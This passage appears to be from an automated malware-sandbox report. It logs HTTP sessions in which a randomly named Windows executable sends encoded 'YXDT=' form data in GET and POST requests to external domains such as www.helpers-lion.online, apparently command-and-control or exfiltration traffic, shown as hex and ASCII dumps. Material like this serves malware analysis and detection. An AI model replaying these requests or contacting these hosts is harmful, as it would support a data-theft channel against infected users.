58 78 31 4e 6b 61 56 58 4c 33 32 59 43 4b 4d 45 4c 32 54 30 64 6c 69 4b 58 4a 35 57 76 39 31 77 36 47 34 37 2f 4f 44 4a 2b 2f 76 39 41 65 59 47 42 35 6d 4b 48 77 36 31 6c 45 31 76 45 7a 4b 30 66 6a 35 66 57 69 53 4c 6b 6a 59 58 38 63 69 43 48 6a 2f 57 52 51 72 56 64 2f 42 2f 43 69 45 71 4f 63 31 4d 6c 50 74 2b 64 64 4a 47 4a 73 68 52 6f 59 58 6f 47 75 57 34 6d 38 31 30 64 68 69 63 72 4d 72 69 6d 54 44 42 4e 31 4e 4f 72 64 49 70 50 56 39 57 65 48 7a 46 51 64 46 59 47 57 77 64 30 32 39 7a 53 52 39 4a 63 4a 32 2b 37 41 38 69 6d 54 53 4a 6e 47 4d 59 56 30 2f 65 76 49 79 58 6d 37 6e 4d 54 39 6c 50 76 5a 39 65 5a 38 4c 75 4d 43 6d 59 36 4b 30 57 55 33 58 31 33 71 79 73 43 61 45 46 2f 34 76 59 78 72 41 49 64 59 31 6c 4f 56 52 48 31 4f 48 49 54 4c 44 34 61 4a 5a 6e 46 6b 4e 59 36 4a 52 73 63 52 67 71 6f 45 30 4b 48 41 77 36 6d 49 4c 31 47 6c 30 79 44 47 54 4b 76 [TRUNCATED] Data Ascii: YXDT=+FKgbPBnyVok6Ev2EK4U/MTHrh6YWLwBonVTv5FFX0S6Xx1NkaVXL32YCKMEL2T0dliKXJ5Wv91w6G47/ODJ+/v9AeYGB5mKHw61lE1vEzK0fj5fWiSLkjYX8ciCHj/WRQrVd/B/CiEqOc1MlPt+ddJGJshRoYXoGuW4m810dhicrMrimTDBN1NOrdIpPV9WeHzFQdFYGWwd029zSR9JcJ2+7A8imTSJnGMYV0/evIyXm7nMT9lPvZ9eZ8LuMCmY6K0WU3X13qysCaEF/4vYxrAIdY1lOVRH1OHITLD4aJZnFkNY6JRscRgqoE0KHAw6mIL1Gl0yDGTKvVgTBRnEyILfJ7GonCuCHn8OczepwOWW7WbCsvI3gPJK4ogHgBbZoMNFyBJVZy51HmU5chAg6EaSOauaR5X8Y4vO4FxKMAh1kY4l5OeInFjFhRwDC7LVRKQtaJzhs4rM7axpX6La/OZCaQ/LFXneh5VUIZ1YEJMNdRKVUxCXnv/u/uswFS0L5N8X8FfdMW9Sm9hWCOiXy7WD7/E/IiJRHXNvWECeH8mBZQmk+fMvwltu5m4bKWfqWdZIWeqQGFz+9BOLI4Cy8ArfItxOk9qtVhZ9h+yp7S4RRRW4PXlhWNNSXfmQfq9L3il3dUMME9CIdEW945wdRoTcd1bPINPriv7nYtjl6m1WuZhrqzkDXlNPiHkvr4jNim86EYR9EEyigX/0pJF7J/2zfvRMrlsWPMm7ar0/LLAAoHF6MQ3OszwGhEA7IyGYR7SPN5iP0fRV54d/KBxfLBWahuh+B/P0HEDYcKaMUUHBrcDcS1Y6ZGjd6i0jIuTa94bnexK2eFKcjKSJl52ZGlKK1NP9MhA5cipobQs1HOeFJonxDbx/OC2w8BbOAU5YQltez3Nl59P5iP14ReIbUtABDOlYPILTgLBe0ECeScv78RD6vjmuxXxmdsZX32ccwlqZ6MU0hHVV1Z6MHPYIlrHG9MnOS/njgIAAxKeXsw6N4VY [TRUNCATED]
Aug 12, 2024 05:16:14.881951094 CEST	707	IN	HTTP/1.1 405 Not Allowed date: Mon, 12 Aug 2024 03:16:14 GMT content-type: text/html content-length: 556 server: Parking/1.0 connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED] Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.4	49771	91.195.240.19	80	2008	C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exe

Timestamp	Bytes transferred	Direction	Data
Aug 12, 2024 05:16:16.760590076 CEST	502	OUT	GET /tf44/?YXDT=zHiAY6EG+HxIxFu9b4tfleXF6yb9aKgM+W8Rr/tGfSzDPDxggLk9FyyADeImH3/ZYgS5WMd+vNhhyXlbnciywdLjC/RTAaKLEzmduXRfLlKkNxNmYFq4qCQ=&ZH3=yf1H3v6h HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Host: www.gipsytroya.com Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Aug 12, 2024 05:16:17.398683071 CEST	113	IN	HTTP/1.1 439 date: Mon, 12 Aug 2024 03:16:17 GMT content-length: 0 server: Parking/1.0 connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.4	49772	194.58.112.174	80	2008	C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exe

Timestamp	Bytes transferred	Direction	Data
Aug 12, 2024 05:16:22.525908947 CEST	789	OUT	POST /mooq/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Accept-Encoding: gzip, deflate, br Host: www.helpers-lion.online Origin: http://www.helpers-lion.online Cache-Control: max-age=0 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 201 Referer: http://www.helpers-lion.online/mooq/ User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36 Data Raw: 59 58 44 54 3d 33 41 52 4a 70 41 4f 43 46 54 64 57 33 52 42 38 33 49 62 4b 43 6f 51 66 34 6b 2f 52 64 68 69 31 57 79 69 69 30 73 54 56 46 56 2f 4c 66 58 36 68 4a 69 54 4e 38 41 56 6d 75 53 62 39 4f 61 33 48 72 48 4d 52 51 6a 63 45 44 76 62 36 48 52 49 34 67 43 49 6a 6e 4e 63 6a 52 47 45 6d 35 33 56 71 68 43 75 77 46 6d 62 4e 68 41 74 45 54 2f 77 4a 47 6e 61 37 59 38 58 33 6e 4e 7a 44 6c 67 6d 39 4f 45 64 41 49 2f 36 55 7a 56 52 61 74 4e 68 4f 34 71 4b 45 6d 78 30 4c 6f 41 37 75 41 46 71 72 44 6b 62 4d 66 71 58 32 51 5a 2b 4c 74 72 59 69 4a 56 42 74 62 61 4e 51 76 6c 72 33 4d 43 6f 41 73 51 3d 3d Data Ascii: YXDT=3ARJpAOCFTdW3RB83IbKCoQf4k/Rdhi1Wyii0sTVFV/LfX6hJiTN8AVmuSb9Oa3HrHMRQjcEDvb6HRI4gCIjnNcjRGEm53VqhCuwFmbNhAtET/wJGna7Y8X3nNzDlgm9OEdAI/6UzVRatNhO4qKEmx0LoA7uAFqrDkbMfqX2QZ+LtrYiJVBtbaNQvlr3MCoAsQ==
Aug 12, 2024 05:16:23.205086946 CEST	1236	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 12 Aug 2024 03:16:23 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Content-Encoding: gzip Data Raw: 65 33 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6d 6f db d6 15 fe 9e 5f 71 a3 01 96 94 88 64 9c b4 43 12 4b 72 d3 a4 db 97 b4 1d e0 74 c3 e0 a6 c2 15 75 2d b1 a2 48 8d a4 ec a8 49 80 36 e9 2b 1a 34 68 57 60 43 b1 f7 61 d8 a7 01 89 13 af 6e 5e 9c bf 40 fe a3 3d e7 5c 92 a2 64 c9 71 d2 b4 ab 01 db d2 7d 3d f7 9c e7 3c e7 dc 97 fa d1 8e 6f 47 e3 a1 12 bd 68 e0 36 eb f4 57 d8 ae 0c c3 46 c9 09 5b b2 23 87 91 b3 a9 4a c2 95 5e b7 51 0a 46 25 b4 51 b2 d3 ac 0f 54 24 85 dd 93 41 a8 a2 46 e9 ad 4b bf 30 4e a3 8e 4b 3d 39 50 8d d2 50 06 7d c7 eb 96 84 ed 7b 91 f2 d0 28 50 dd 60 64 04 18 73 ba e5 a6 a3 b6 86 7e 10 15 9a 6e 39 9d a8 d7 e8 a8 4d c7 56 06 7f a9 39 9e 13 39 d2 35 42 5b ba aa b1 8c 21 22 27 72 55 73 6b 6b cb ec 29 77 a8 82 d0 70 1d df 33 7d cf 75 3c 55 b7 74 75 1d 5f fa 22 50 6e a3 14 46 63 57 85 3d a5 30 d3 40 75 1c d9 28 49 d7 2d 89 5e a0 36 72 79 59 3e 43 8e 22 df b4 c3 10 b3 4c fa 3b 58 49 d6 7a 43 42 34 4c 86 3f ab cb 25 41 2a 84 c6 06 b2 ab ac 2b 06 37 6c d6 43 3b 70 86 51 d3 3a 56 3f ba [TRUNCATED] Data Ascii: e34Zmo_qdCKrtu-HI6+4hW`Can^@=\dq}=<oGh6WF[#J^QF%QT$AFK0NK=9PP}{(P`ds~n9MV995B[!"'rUskk)wp3}u<Utu_"PnFcW=0@u(I-^6ryY>C"L;XIzCB4L?%A*+7lC;pQ:V?~KYGoQ 7hgGRz}u1n,T@z#\-?8dXF0@0LfQ~f5i$<l$!;mc[Ek2SmN4pV+!J);G$R`x/~Em\|'y\|^%WpHmxax&<X;oo(Y]V0fu43V+uvc+CdbfX<buJF:?iyL[nw2UoxW[,~By3VEt%`Zlh"tS-@` ]G=\b(;XxfG4hm\|'V,$tk(U#Dx%^i>s-ku2-P2!uZ<x/$)A-d8)k!d0kggU]UGXo1zwEm_G [TRUNCATED]
Aug 12, 2024 05:16:23.205149889 CEST	1236	IN	Data Raw: c0 83 46 df d3 f6 e9 ac 13 f3 17 98 d6 35 06 f0 6a c7 6b b9 6a 23 32 b4 87 63 c2 28 f0 bd ee d3 8d 02 5a 06 dc 6d 8a 6a ff 02 7a 11 c2 a0 de c7 f1 3d e0 8c 47 98 62 db 59 ff d5 ca 09 47 6d 6d f2 5c 92 b6 0f de 1b 20 68 7a 0a e3 fe 19 a1 f0 7e f2 Data Ascii: F5jkj#2c(Zmjz=GbYGmm\ hz~%\qy)nT\@)9tJF@o\|ZYj!;]har`$C/0N1(~$?<,CfRN>C+@?: 1AO!V?lX
Aug 12, 2024 05:16:23.205185890 CEST	1236	IN	Data Raw: bb 78 2a ab 44 16 fc 4f a2 4f 66 3d 90 97 0e cb 22 4f 4f 53 8c 71 32 be 18 91 d9 06 9d d3 5a d0 1f 45 79 ca 0b 8a 89 2d 12 69 ce 12 38 53 2e 9c 5b a0 39 d2 64 b0 fa 23 30 e9 a7 1c fd b1 e1 65 b4 43 9e a3 22 fe 86 bb 01 d5 3a f5 00 89 d7 b0 89 ce Data Ascii: xDOOf="OOSq2ZEy-i8S.[9d#0eC":wO\3mb.@8>2D=8@39i#(O l:#48SNtVOdgOLWp62^="?7YF>P8V
Aug 12, 2024 05:16:23.205220938 CEST	114	IN	Data Raw: 89 de cb bd 0a 0b d9 aa 50 8b 23 87 4d 27 f4 03 2e e2 71 af 17 8d ec f9 59 14 e3 6c da 19 74 f5 db b6 b9 2b d9 a2 10 66 65 f2 e2 15 1c 1d 72 e3 59 a0 0f c7 c2 43 9f b3 b2 1d fa ee 28 52 2b 82 ae 4a ce 1a 67 f0 33 bc b2 52 12 d2 c5 43 29 72 04 9d Data Ascii: P#M'.qYlt+ferYC(R+Jg3RC)rO&%Yp~ykFi)0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.4	49773	194.58.112.174	80	2008	C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exe

Timestamp	Bytes transferred	Direction	Data
Aug 12, 2024 05:16:25.058386087 CEST	809	OUT	POST /mooq/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Accept-Encoding: gzip, deflate, br Host: www.helpers-lion.online Origin: http://www.helpers-lion.online Cache-Control: max-age=0 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 221 Referer: http://www.helpers-lion.online/mooq/ User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36 Data Raw: 59 58 44 54 3d 33 41 52 4a 70 41 4f 43 46 54 64 57 33 79 4a 38 31 72 44 4b 46 49 51 59 79 45 2f 52 53 42 6a 38 57 79 75 69 30 70 2f 46 46 48 72 4c 66 33 4b 68 49 6e 76 4e 37 41 56 6d 68 79 62 34 44 36 33 59 72 48 41 5a 51 6a 51 45 44 76 66 36 48 51 34 34 31 6c 6b 6b 6d 64 63 68 58 47 45 6f 33 58 56 71 68 43 75 77 46 6d 2f 7a 68 45 4a 45 54 50 41 4a 47 47 61 34 51 63 58 6f 67 4e 7a 44 68 67 6d 68 4f 45 64 75 49 37 36 2b 7a 54 64 61 74 4d 52 4f 37 37 4b 44 78 68 30 4e 6d 67 36 50 4e 41 4c 45 45 46 32 32 42 59 43 57 59 62 4c 75 73 74 4a 34 59 6b 67 36 4a 61 70 6a 79 69 69 44 42 42 56 4a 33 59 61 64 73 76 59 48 30 39 2f 70 57 5a 76 66 51 6c 4d 7a 72 75 6b 3d Data Ascii: YXDT=3ARJpAOCFTdW3yJ81rDKFIQYyE/RSBj8Wyui0p/FFHrLf3KhInvN7AVmhyb4D63YrHAZQjQEDvf6HQ441lkkmdchXGEo3XVqhCuwFm/zhEJETPAJGGa4QcXogNzDhgmhOEduI76+zTdatMRO77KDxh0Nmg6PNALEEF22BYCWYbLustJ4Ykg6JapjyiiDBBVJ3YadsvYH09/pWZvfQlMzruk=
Aug 12, 2024 05:16:25.748203039 CEST	1236	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 12 Aug 2024 03:16:25 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Content-Encoding: gzip Data Raw: 65 33 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6d 6f db d6 15 fe 9e 5f 71 a3 01 96 94 88 64 9c b4 43 12 4b 72 d3 a4 db 97 b4 1d e0 74 c3 e0 a6 c2 15 75 2d b1 a2 48 8d a4 ec a8 49 80 36 e9 2b 1a 34 68 57 60 43 b1 f7 61 d8 a7 01 89 13 af 6e 5e 9c bf 40 fe a3 3d e7 5c 92 a2 64 c9 71 d2 b4 ab 01 db d2 7d 3d f7 9c e7 3c e7 dc 97 fa d1 8e 6f 47 e3 a1 12 bd 68 e0 36 eb f4 57 d8 ae 0c c3 46 c9 09 5b b2 23 87 91 b3 a9 4a c2 95 5e b7 51 0a 46 25 b4 51 b2 d3 ac 0f 54 24 85 dd 93 41 a8 a2 46 e9 ad 4b bf 30 4e a3 8e 4b 3d 39 50 8d d2 50 06 7d c7 eb 96 84 ed 7b 91 f2 d0 28 50 dd 60 64 04 18 73 ba e5 a6 a3 b6 86 7e 10 15 9a 6e 39 9d a8 d7 e8 a8 4d c7 56 06 7f a9 39 9e 13 39 d2 35 42 5b ba aa b1 8c 21 22 27 72 55 73 6b 6b cb ec 29 77 a8 82 d0 70 1d df 33 7d cf 75 3c 55 b7 74 75 1d 5f fa 22 50 6e a3 14 46 63 57 85 3d a5 30 d3 40 75 1c d9 28 49 d7 2d 89 5e a0 36 72 79 59 3e 43 8e 22 df b4 c3 10 b3 4c fa 3b 58 49 d6 7a 43 42 34 4c 86 3f ab cb 25 41 2a 84 c6 06 b2 ab ac 2b 06 37 6c d6 43 3b 70 86 51 d3 3a 56 3f ba [TRUNCATED] Data Ascii: e34Zmo_qdCKrtu-HI6+4hW`Can^@=\dq}=<oGh6WF[#J^QF%QT$AFK0NK=9PP}{(P`ds~n9MV995B[!"'rUskk)wp3}u<Utu_"PnFcW=0@u(I-^6ryY>C"L;XIzCB4L?%A*+7lC;pQ:V?~KYGoQ 7hgGRz}u1n,T@z#\-?8dXF0@0LfQ~f5i$<l$!;mc[Ek2SmN4pV+!J);G$R`x/~Em\|'y\|^%WpHmxax&<X;oo(Y]V0fu43V+uvc+CdbfX<buJF:?iyL[nw2UoxW[,~By3VEt%`Zlh"tS-@` ]G=\b(;XxfG4hm\|'V,$tk(U#Dx%^i>s-ku2-P2!uZ<x/$)A-d8)k!d0kggU]UGXo1zwEm_G [TRUNCATED]
Aug 12, 2024 05:16:25.748261929 CEST	1236	IN	Data Raw: c0 83 46 df d3 f6 e9 ac 13 f3 17 98 d6 35 06 f0 6a c7 6b b9 6a 23 32 b4 87 63 c2 28 f0 bd ee d3 8d 02 5a 06 dc 6d 8a 6a ff 02 7a 11 c2 a0 de c7 f1 3d e0 8c 47 98 62 db 59 ff d5 ca 09 47 6d 6d f2 5c 92 b6 0f de 1b 20 68 7a 0a e3 fe 19 a1 f0 7e f2 Data Ascii: F5jkj#2c(Zmjz=GbYGmm\ hz~%\qy)nT\@)9tJF@o\|ZYj!;]har`$C/0N1(~$?<,CfRN>C+@?: 1AO!V?lX
Aug 12, 2024 05:16:25.748301029 CEST	1236	IN	Data Raw: bb 78 2a ab 44 16 fc 4f a2 4f 66 3d 90 97 0e cb 22 4f 4f 53 8c 71 32 be 18 91 d9 06 9d d3 5a d0 1f 45 79 ca 0b 8a 89 2d 12 69 ce 12 38 53 2e 9c 5b a0 39 d2 64 b0 fa 23 30 e9 a7 1c fd b1 e1 65 b4 43 9e a3 22 fe 86 bb 01 d5 3a f5 00 89 d7 b0 89 ce Data Ascii: xDOOf="OOSq2ZEy-i8S.[9d#0eC":wO\3mb.@8>2D=8@39i#(O l:#48SNtVOdgOLWp62^="?7YF>P8V
Aug 12, 2024 05:16:25.748332977 CEST	114	IN	Data Raw: 89 de cb bd 0a 0b d9 aa 50 8b 23 87 4d 27 f4 03 2e e2 71 af 17 8d ec f9 59 14 e3 6c da 19 74 f5 db b6 b9 2b d9 a2 10 66 65 f2 e2 15 1c 1d 72 e3 59 a0 0f c7 c2 43 9f b3 b2 1d fa ee 28 52 2b 82 ae 4a ce 1a 67 f0 33 bc b2 52 12 d2 c5 43 29 72 04 9d Data Ascii: P#M'.qYlt+ferYC(R+Jg3RC)rO&%Yp~ykFi)0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.4	49774	194.58.112.174	80	2008	C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exe

Timestamp	Bytes transferred	Direction	Data
Aug 12, 2024 05:16:27.594923019 CEST	10891	OUT	POST /mooq/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Accept-Encoding: gzip, deflate, br Host: www.helpers-lion.online Origin: http://www.helpers-lion.online Cache-Control: max-age=0 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 10301 Referer: http://www.helpers-lion.online/mooq/ User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36 Data Raw: 59 58 44 54 3d 33 41 52 4a 70 41 4f 43 46 54 64 57 33 79 4a 38 31 72 44 4b 46 49 51 59 79 45 2f 52 53 42 6a 38 57 79 75 69 30 70 2f 46 46 48 7a 4c 66 45 79 68 48 6b 48 4e 36 41 56 6d 6f 53 62 35 44 36 32 43 72 48 6f 64 51 6a 4d 2b 44 74 58 36 47 79 77 34 6b 30 6b 6b 73 64 63 68 62 6d 45 6c 35 33 56 2f 68 43 2b 30 46 6d 50 7a 68 45 4a 45 54 4e 59 4a 53 48 61 34 57 63 58 33 6e 4e 7a 78 6c 67 6d 46 4f 45 46 59 49 37 32 45 7a 6a 39 61 75 73 42 4f 2b 4a 79 44 75 52 30 50 32 77 36 74 4e 41 50 62 45 46 36 4c 42 64 2f 42 59 59 58 75 75 34 6b 5a 49 6c 55 46 66 61 31 45 74 7a 4f 34 50 32 67 4b 76 4c 47 6e 6c 4f 45 65 67 50 71 62 62 4a 44 58 56 45 73 76 36 37 54 38 45 5a 48 61 38 52 78 57 54 5a 30 4d 36 67 50 4e 45 6e 5a 5a 52 4d 45 63 4c 4a 6c 4c 79 57 68 6c 35 6b 62 31 6d 35 42 67 67 4f 68 2b 6e 71 44 52 67 6e 44 4d 4f 57 77 57 33 72 67 41 72 78 38 54 72 49 51 35 34 56 61 45 6f 67 45 4a 56 37 66 75 58 41 77 56 47 45 44 4e 6a 37 37 30 69 4c 48 72 57 72 7a 4d 76 78 37 46 32 73 54 6d 6f 33 2b 79 4e 55 41 54 76 [TRUNCATED] Data Ascii: YXDT=3ARJpAOCFTdW3yJ81rDKFIQYyE/RSBj8Wyui0p/FFHzLfEyhHkHN6AVmoSb5D62CrHodQjM+DtX6Gyw4k0kksdchbmEl53V/hC+0FmPzhEJETNYJSHa4WcX3nNzxlgmFOEFYI72Ezj9ausBO+JyDuR0P2w6tNAPbEF6LBd/BYYXuu4kZIlUFfa1EtzO4P2gKvLGnlOEegPqbbJDXVEsv67T8EZHa8RxWTZ0M6gPNEnZZRMEcLJlLyWhl5kb1m5BggOh+nqDRgnDMOWwW3rgArx8TrIQ54VaEogEJV7fuXAwVGEDNj770iLHrWrzMvx7F2sTmo3+yNUATviEhgvnNriT0tnQzrKqGJVSK1vedybNrCO5Yqmb4xa5ieNH6e0pBMHgK7ZIdiPd19QDQamaAWcbt86V1iiO9IeO7dRuvOlCZCMwOFFqKshx9NW6gWPWM5zo6mA4gwsP0riFJItYGJrMjDvVmY6cGm8FFOm5bQlHQvP334W5EsubhZbyWNHOKfFo+iDp0y0zxw4t5pJIYmo+Rz7i+jdS2wvAJyGRdQDXfsmZAX1kmw0/VO3HUatCJr6qv6p9Acfd7mN05qlTSIP05VVCx7XL3rBWF+4f1dUnj74gDkT28vrnrBcgng+YAtRIhjKcMH6amnKcL8+7sKGH9QXsnVxjTqGHcdNeZcmfQCqBP5q0DbvGshKi038c9MKPDAALXGT2kCJ9twv2vPtszCobcDF9clzOU7YQX4hdJ/c1Z4PzzEmasHe9wdmL+Gf3u9Nd1VV535k4SChkSXLMRUXXGTiLmPCU7ZqUmuXBIdbpWEDDFbcFezHkrn8N+O0lqhms4bBtmiY7EdVQydSTmg9faGLB0HT2o0N28dKhObFd0MO0G0XGpBC4dgc3aD3fRuqMkOGAXo2xKsgKzGc7Nqk8KqO/N1CM/1me+7JlMKBQTOL9ID2PNMi6QJ/ahuLii3FsQl8gGj+NwDBllmFmBz35Z/f9xD1m29H0eAWExwCB [TRUNCATED]
Aug 12, 2024 05:16:28.296330929 CEST	1236	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 12 Aug 2024 03:16:28 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Content-Encoding: gzip Data Raw: 65 33 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6d 6f db d6 15 fe 9e 5f 71 a3 01 96 94 88 64 9c b4 43 12 4b 72 d3 a4 db 97 b4 1d e0 74 c3 e0 a6 c2 15 75 2d b1 a2 48 8d a4 ec a8 49 80 36 e9 2b 1a 34 68 57 60 43 b1 f7 61 d8 a7 01 89 13 af 6e 5e 9c bf 40 fe a3 3d e7 5c 92 a2 64 c9 71 d2 b4 ab 01 db d2 7d 3d f7 9c e7 3c e7 dc 97 fa d1 8e 6f 47 e3 a1 12 bd 68 e0 36 eb f4 57 d8 ae 0c c3 46 c9 09 5b b2 23 87 91 b3 a9 4a c2 95 5e b7 51 0a 46 25 b4 51 b2 d3 ac 0f 54 24 85 dd 93 41 a8 a2 46 e9 ad 4b bf 30 4e a3 8e 4b 3d 39 50 8d d2 50 06 7d c7 eb 96 84 ed 7b 91 f2 d0 28 50 dd 60 64 04 18 73 ba e5 a6 a3 b6 86 7e 10 15 9a 6e 39 9d a8 d7 e8 a8 4d c7 56 06 7f a9 39 9e 13 39 d2 35 42 5b ba aa b1 8c 21 22 27 72 55 73 6b 6b cb ec 29 77 a8 82 d0 70 1d df 33 7d cf 75 3c 55 b7 74 75 1d 5f fa 22 50 6e a3 14 46 63 57 85 3d a5 30 d3 40 75 1c d9 28 49 d7 2d 89 5e a0 36 72 79 59 3e 43 8e 22 df b4 c3 10 b3 4c fa 3b 58 49 d6 7a 43 42 34 4c 86 3f ab cb 25 41 2a 84 c6 06 b2 ab ac 2b 06 37 6c d6 43 3b 70 86 51 d3 3a 56 3f ba [TRUNCATED] Data Ascii: e34Zmo_qdCKrtu-HI6+4hW`Can^@=\dq}=<oGh6WF[#J^QF%QT$AFK0NK=9PP}{(P`ds~n9MV995B[!"'rUskk)wp3}u<Utu_"PnFcW=0@u(I-^6ryY>C"L;XIzCB4L?%A*+7lC;pQ:V?~KYGoQ 7hgGRz}u1n,T@z#\-?8dXF0@0LfQ~f5i$<l$!;mc[Ek2SmN4pV+!J);G$R`x/~Em\|'y\|^%WpHmxax&<X;oo(Y]V0fu43V+uvc+CdbfX<buJF:?iyL[nw2UoxW[,~By3VEt%`Zlh"tS-@` ]G=\b(;XxfG4hm\|'V,$tk(U#Dx%^i>s-ku2-P2!uZ<x/$)A-d8)k!d0kggU]UGXo1zwEm_G [TRUNCATED]
Aug 12, 2024 05:16:28.296379089 CEST	224	IN	Data Raw: c0 83 46 df d3 f6 e9 ac 13 f3 17 98 d6 35 06 f0 6a c7 6b b9 6a 23 32 b4 87 63 c2 28 f0 bd ee d3 8d 02 5a 06 dc 6d 8a 6a ff 02 7a 11 c2 a0 de c7 f1 3d e0 8c 47 98 62 db 59 ff d5 ca 09 47 6d 6d f2 5c 92 b6 0f de 1b 20 68 7a 0a e3 fe 19 a1 f0 7e f2 Data Ascii: F5jkj#2c(Zmjz=GbYGmm\ hz~%\qy)nT\@)9tJF@o\|ZYj!;]har`$C/0N1(~$?<,CfRN>C+@?: 1
Aug 12, 2024 05:16:28.296422005 CEST	1236	IN	Data Raw: 41 0b fd 4f f2 21 56 b4 13 3f 80 6c bb 58 08 16 91 dc 16 94 e9 a4 05 c8 7d d8 31 d3 0a 8a a1 b4 e0 1d fc 7f 40 6b cc 82 2b 34 90 7c c2 5a 60 5f 86 96 e2 ef a0 16 b4 fd e1 d7 fb 6f cc 4d d6 60 30 1e b4 da 3f 25 9f a7 66 bd c7 d6 4c 97 c9 24 b4 13 Data Ascii: AO!V?lX}1@k+4\|Z`_oM`0?%fL$?Br8!D(<a~agp#$!%@uyL:\|dt4SW \-YNG."5ly4(6iF2<$
Aug 12, 2024 05:16:28.296458960 CEST	1126	IN	Data Raw: f9 be 12 f7 14 b8 59 a8 8a e9 46 d4 3e 50 38 9a f3 56 a6 3a 5f 3f 32 f5 75 32 16 ee 39 5a 4e 67 ee 38 9b 32 10 74 33 10 e2 ea 15 77 e0 a3 01 2e a2 cc df 8d 54 30 5e 53 2e d8 df 0f ce b9 6e 45 94 65 59 54 a7 67 23 29 36 fc 00 f2 d2 18 0e fa 9f 58 Data Ascii: YF>P8V:_?2u29ZNg82t3w.T0^S.nEeYTg#)6Xtz(9~\|I&]ysR^-WELo1[r\%rC5GTI?c}uSr46\`GL,vk"cWA`^F7i%}*ejW<P

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
